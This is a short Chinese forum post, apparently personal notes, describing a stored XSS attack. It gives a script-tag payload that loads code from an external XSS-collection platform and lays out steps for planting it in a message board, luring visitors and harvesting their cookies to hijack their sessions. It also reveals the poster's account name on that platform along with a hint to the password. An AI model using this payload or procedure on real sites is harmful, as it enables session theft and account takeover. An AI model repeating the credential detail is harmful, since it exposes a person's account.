老莫的笔记本  
  
查看: 1190|回复: 0

存储型XSS攻击

[复制链接]

662

主题

878

帖子

5143

积分

超级版主

Rank: 8Rank: 8

积分
5143
发表于 2019-3-4 23:45:09 | 显示全部楼层 |阅读模式
/*
       
        注入 是将用户输入的数据当做SQL 语句 放入到数据库进行查询。
       
        XSS 是将用户输入的数据 当做HTML语句放到页面上执行。
       
        存储型 Xss 跨站脚本攻击 是获取本地的 COOkie
       
       
        XSS 平台的生成网址 : https://xsspt.com/index.php?do=register
       
        我在该平台的注册号是 : tjr0617  密码一样
       
               
        操作流程:
       
                1,。 先去 XSS 平台 一顿操作猛如虎 生成 XSS 代码 ,
                2. 复制 里面 <script src=https://xsspt.com/u1gXjo></script> 那一句 复制到页面上, 可以放在留言板里准备提交;
                3. 让别人访问这个网址, 你就 跑去XSS后台 看他的cookie.
                4. 把 得到的cookie 放到 浏览器插件中试试效果
               
               



*/

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表